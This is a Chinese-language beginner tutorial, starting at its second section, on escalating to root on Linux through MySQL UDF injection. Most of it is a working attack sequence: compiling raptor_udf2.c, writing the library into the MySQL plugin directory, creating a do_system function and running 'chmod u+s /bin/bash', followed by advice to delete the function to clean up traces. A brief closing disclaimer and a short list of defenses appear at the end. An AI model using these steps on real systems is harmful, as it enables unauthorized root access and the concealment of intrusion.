Linux提权实战指南（副标题：通过MySQL UDF实现权限提升，小白也能学会）

二、前提条件

• 已获取MySQL数据库的登录凭据（如用户名和密码）。
• MySQL服务运行在Linux系统上，并且具有FILE权限。
• 系统支持UDF库编译（需安装gcc等工具）。

三、详细步骤：从编译到提权

步骤1：编译UDF库

首先，在Linux系统上编译UDF库文件。如果系统没有gcc，请先安装：sudo apt-get install gcc（适用于Debian/Ubuntu）。然后，下载或创建UDF源码文件（如raptor_udf2.c），并使用以下命令编译：

gcc -shared -o raptor_udf2.so raptor_udf2.c

这将生成raptor_udf2.so文件，用于UDF提权。

步骤2：上传UDF库到MySQL

通过MySQL客户端，将.so文件上传到数据库插件目录。首先登录MySQL：mysql -u root -p，然后查找插件目录：

SHOW VARIABLES LIKE "plugin_dir";

将编译好的.so文件复制到该目录（需系统权限），或在MySQL中使用SELECT INTO DUMPFILE写入（需FILE权限）。这涉及数据库安全配置，务必谨慎操作。

步骤3：创建UDF函数并提权

在MySQL中，创建函数来执行系统命令。例如：

CREATE FUNCTION do_system RETURNS INTEGER SONAME "raptor_udf2.so"; SELECT do_system("chmod u+s /bin/bash");

此命令可能赋予bash SUID权限，从而实现Linux提权。完成后，清理痕迹删除函数。

四、注意事项与防御措施

MySQL UDF提权仅用于授权测试，滥用可能违法。为增强安全，建议：限制MySQL FILE权限、定期更新补丁、监控插件目录。这能提升整体数据库安全水平。

五、总结

通过本教程，你学会了UDF提权的基本流程，从编译库到执行命令。记住，安全是一个持续过程，理解这些技术有助于更好地防护系统。如果你是小白，建议在虚拟环境中练习。